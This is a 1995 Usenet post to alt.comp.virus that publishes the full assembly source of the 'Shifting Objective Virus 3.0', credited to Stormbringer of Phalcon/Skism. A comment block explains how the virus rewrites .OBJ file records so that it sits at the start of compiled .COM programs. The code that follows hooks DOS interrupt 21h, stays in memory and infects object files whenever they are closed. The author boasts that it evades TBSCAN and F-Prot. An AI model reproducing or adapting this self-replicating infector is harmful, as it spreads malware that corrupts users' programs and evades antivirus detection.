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From netcom.com!ix.netcom.com!howland.reston.ans.net!gatech!bloom-beacon.mit.edu!news.media.mit.edu!tmok.res.wpi.edu!halflife Sat Jan 14 12:23:41 1995
Xref: netcom.com alt.comp.virus:1000
Newsgroups: alt.comp.virus
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!gatech!bloom-beacon.mit.edu!news.media.mit.edu!tmok.res.wpi.edu!halflife
From: halflife@tmok.res.wpi.edu (Halflife)
Subject: shifting obj
Message-ID: <halflife.21.000B93F3@tmok.res.wpi.edu>
Lines: 437
Sender: news@news.media.mit.edu (USENET News System)
Organization: MIT Media Laboratory
X-Newsreader: Trumpet for Windows [Version 1.0 Rev A]
Date: Fri, 13 Jan 1995 16:34:35 GMT
Lines: 437
;¦ Shifting Objective Virus 3.0 (c) 1994 Stormbringer [Phalcon/Skism] ¦
;¦ ¦
;¦ Memory Resident .OBJ Infector - No TBSCAN Flags, No F-Prot Alarms! ¦
;¦ ¦
;¦ This virus breaks new bounds in viral technology, best I know }-) ¦
;¦It infects .OBJ files that are set up to compile to simple, stand- ¦
;¦alone .COM's. The basic theory for this is the following: It takes ¦
;¦the pre-set compiling points of the modules in the .OBJ and moves them¦
;¦up in memory so Objective will have room to insert itself underneath. ¦
;¦When the file is compiled the virus is at the beginning of the file, ¦
;¦and the original code follows BUT - the original code's memory offsets¦
;¦are what they were BEFORE the virus infected the .OBJ. Therefore, all¦
;¦Objective has to do when it runs is go memory resident, and shift the ¦
;¦host code back down to where it starts at 100h in memory, and all is ¦
;¦well. ¦
;¦ ¦
;¦ Object files are basically a set of linked lists or fields, each ¦
;¦with a three byte header. The first byte is it's identity byte, while¦
;¦the following word is the size of the field - header. The very last ¦
;¦byte of each record is a simple checksum byte - this can be gained ¦
;¦simply by adding up all of the bytes in the field save the three byte ¦
;¦header and taking the negative (not reg/inc reg) so that the entire ¦
;¦field value + checksum = 0. Each field type has it's own identity ¦
;¦value, but we are only concerned with a few right now. ¦
;¦ ¦
;¦They are as follows: ¦
;¦ 80h - Starting field of a .OBJ file ¦
;¦ 8Ch - External definitions ¦
;¦ 8Ah - Ending field of a .OBJ file ¦
;¦ A0h - Regular Code ¦
;¦ A2h - Compressed code (patterns/reiterated stuff) ¦
;¦ ¦
;¦ In the A0h and A2h types of fields, there is one more thing that ¦
;¦concerns us - the three bytes after the field size in the header ¦
;¦are indicators of the location in memory the code will be at - the ¦
;¦second and third byte form the word we will be concerned with, which ¦
;¦is a simple offset from CS:0000 that the code will begin. Since we ¦
;¦are dealing with .COM files and want to put our virus at the beginning¦
;¦of the file, we set the position field of the virus to 100h and the ¦
;¦positions of all the other A0h and A2h fields to their old position ¦
;¦plus the virus size. When the file is compiled, the virus will be ¦
;¦at the beginning and the host will follow. Attaching the virus to ¦
;¦the .OBJ itself is simple enough - just save the 8Ah field in memory, ¦
;¦and write FROM IT'S OLD BEGINNING a header for your virus, your ¦
;¦virus, then a checksum and the old 8Ah field. At all times when ¦
;¦modifying fields, the checksums must be fixed afterwards. ¦
;¦ ¦
;¦ For the rest of the techniques that may be useful, I suggest you ¦
;¦look at the following code for my Shifting Objective Virus. I'd like ¦
;¦to thank The Nightmare for his ideas on this when we sat around bored ¦
;¦those days. Greets go out to all of Phalcon/Skism, Urnst Kouch, ¦
;¦Mark Ludwig, TridenT, NuKE, and the rest of the viral community. ¦
;¦A special hello goes to Hermanni and Frisk. ¦
;¦ ¦
;¦ - Stormbringer [P/S] ¦
;¦ --¤------------------- ¦
;¦ - ¦
.model tiny
.radix 16
org 100
push ds
sub ax,ax
mov ds,ax
mov ax,word ptr ds:[84]
mov word ptr cs:[Fake21IP],ax
mov ax,word ptr ds:[86]
mov word ptr cs:[Fake21CS],ax
mov ax,word ptr ds:[2f*4]
mov word ptr cs:[Fake2fIP],ax
mov ax,word ptr ds:[2f*4+2]
mov word ptr cs:[Fake2fCS],ax
pop ds
mov ax,0feadh ;Check if we are in memory
call fake21
cmp ax,0d00dh
jne ReserveMemory ;Nope, go resident
xor ax,ax
mov ds,ax
jmp RestoreFile ;Yep, skip it
mov ax,ds
dec ax ;Go to MCB's
mov ds,ax
sub word ptr ds:[3],80 ;Grab 2K from this MCB
sub word ptr ds:[12],80 ;And from the Top of MEM in PSP
xor ax,ax
mov ds,ax ;We're gonna take up 2k in memory.
sub word ptr ds:[413],2 ;Reserve 2k from bios
int 12h ;Get bios memory amount in K
mov cl,6
shl ax,cl
push cs
pop ds
sub ax,10 ;NewSeg:0 was in AX, now Newseg:100
mov es,ax ;is start of reserved memory field....
mov di,100
mov si,100
mov cx,end_prog-start
repnz movsb ;Copy virus into memory
xor ax,ax
mov ds,ax ;Hook Int 21h directly using
cli ;Interrupt table
mov ax,offset Int21
xchg word ptr ds:[84],ax
mov word ptr es:[IP_21],ax
mov ax,es
xchg word ptr ds:[86],ax
mov word ptr es:[CS_21],ax
push cs
pop es
mov ax,0deadh ;Call interrupt handler to restore file
call dword ptr ds:[84]
mov ax,4c01 ;Terminate if restore unsuccessful
call fake21
mov ax,0d00dh ;Tell prog we're already here
cmp ax,0feadh
je InstallCheck ;Is it an install check?
cmp ax,0deadh
je RestoreHost ;Or a restoration request?
cmp ah,3e
jz fileclose ;Fileclose - go infect it if it's an .OBJ
db 0ea ;Jump back into int 21h handler
IP_21 dw 0
CS_21 dw 0
push es
pop ds
mov di,sp ;Set iret to return to beginning of code
mov [di],100
mov di,100
mov si,offset Host ;Shift host back down over virus in memory
mov cx,0f000
repnz movsb
mov si,ax
xor ax,ax
mov bx,ax ;Set registers as if just executing
mov cx,ax
mov dx,ax
mov di,ax
iret ;Iret back into the host file
push ax bx cx dx es ds si di bp
xor ax,ax
xor ax,1220h
call fake2f
push bx
mov bl,byte ptr es:[di] ;Good ol' SFT trick
mov ax,1216h
call fake2f
or word ptr es:[di+2],2 ;Set file Read/Write
add di,28
pop bx
cmp byte ptr es:[di+2],'J' ;Check out filename
jne Done_Close
cmp word ptr es:[di],'BO'
jne Done_Close
mov word ptr cs:[Host_Handle],bx
mov ax,5700 ;Save date/time stamp
call fake21
push cx dx
call Infect_Obj ;go infect it
pop dx cx
mov ax,5701 ;Restore date/time stamp
call fake21
pop bp di si ds es dx cx bx ax ;Exit and chain into int 21h
jmp GoInt21
push dx
mov ax,4201 ;Save position of current module
xor cx,cx
xor dx,dx
call fake21
push dx ax
mov ah,3f
mov dx,offset startingpt ;Read starting point
mov cx,3
call fake21
mov ax,word ptr [startingpt+1]
cmp byte ptr firstexec,0 ;Check if this is the first exec field
jne NotFirstExec
;If so, it should have a starting
;point of 100h for a .COM for us
;to infect it correctly
CheckifwillbeCOMfile: ;we're assuming that anything with
mov byte ptr firstexec,1 ;a starting point of cs:100h will be
;a com. while this isn't true all
;the time, we can cross our fingers..
cmp ax,100
je NotFirstExec ;File is good, continue infection.
pop ax ax ax ;won't be a .com file - don't infect.
NotFirstExec: ;Either it isn't first exec or the
mov cx,end_prog-start ;check was good.. now add virus size
add ax,cx ;to exec starting point.
mov word ptr [startingpt+1],ax
pop dx cx
push cx dx
mov ax,4200 ;go back to starting point field
call fake21
mov ah,41
dec ah
mov cx,3
mov dx,offset startingpt ;and save it
call fake21
mov dx,fieldsize
sub dx,4
xor cx,cx ;go to checksum field
mov ax,4201
call fake21
mov ah,3f
mov dx,offset Checksum ;read checksum field
mov cx,1
call fake21
mov cx,-1
mov dx,-1 ;go back to checksum field in file
mov ax,4201
call fake21
mov cx,(end_prog-start)
sub Checksum,ch ;modify checksum to account for
sub Checksum,cl ;our change to starting point field.
mov ah,41
mov dx,offset Checksum ;and write it
mov cx,1
dec ah
call fake21
pop dx cx
mov ax,4200 ;Restore original file pointer
call fake21
pop dx
jmp NExtfield ;and continue with infection
startingpt db 0,0,0
firstexec db 0
jmp isanexec
push cs cs
pop es ds
mov firstexec,0 ;Init first exec field
call go_bof ;Go to beginning of file
call ReadHeader ;read the three byte header, field size in DX
;Header type in AL
cmp al,8c ;External module
je bailout ;It has external calls, which we can't
;handle yet :(
cmp al,0a0 ;Executable module
je anexec
cmp al,0a2 ;Reiterated executable module
je anexec
cmp al,8a ;Ending module
je DoneModExecs
mov ax,4201 ;Go to the next field
xor cx,cx
call fake21
jmp ModExecFields
mov ax,4201
mov cx,-1
mov dx,-3 ;go to start of 8A field (end module)
call fake21
push dx ax
mov cx,fieldsize
add cx,3+10 ;the +10 is just to be safe
mov ah,3f ;load in last module
mov dx,offset buffer
call fake21
mov endfieldsize,ax ;Read in the end module
pop dx cx
mov ax,4200 ;Go back to the beginning of the module
call fake21 ;now that we have it in memory
mov ah,3f
mov cx,endheader-ourheader ;write the header for virus module
mov dx,offset ourheader
inc ah
call fake21
mov ah,3f
mov cx,end_prog-start ;write virus to file
mov dx,100
inc ah
call fake21
mov si,100
mov cx,end_prog-start
xor ax,ax
AddupChecksum: ;Create checksum for virus
add ah,al
loop AddupChecksum
not ah
inc ah
mov Checksum,ah
mov dx,offset Checksum
mov cx,1
mov ah,3f
inc ah
call fake21 ;Then save the checksum in module
mov dx,offset Buffer
mov cx,endfieldsize
mov ah,3f
inc ah
call fake21 ;And put the ending module back into
ret ;place.... we're done.
mov ah,3f
mov dx,offset fieldheader
mov cx,3 ;Read module header for .obj files
call fake21 ;save module type in AL and
mov al,fieldheader ;module size in DX
mov dx,fieldsize
Go_Bof: ;Go to beginning of file
mov al,0
jmp short movefp
Go_Eof: ;Go to the end of the file
mov al,02
movefp: ;Or just move the File pointer
xor cx,cx
xor dx,dx
mov ah,42
call fake21
db 9a
fake21IP dw 0
fake21CS dw 0
db 9a
fake2fIP dw 0
fake2fCS dw 0
db 'Shifting Objective Virus 3.0 (c) 1994 Stormbringer [Phalcon/Skism]'
db 'Kudos go to The Nightmare!'
db 0A0
dw (end_prog-start+4) ;our size in an .OBJ file
db 1
db 0 ;starting position (cs:100h)
db 1
endfieldsize dw 0
Checksum db 0
fieldheader db 0
fieldsize dw 0
Host_Handle dw 0
Host db 90,90,90,90,90,90,90,90,0cdh,20
end start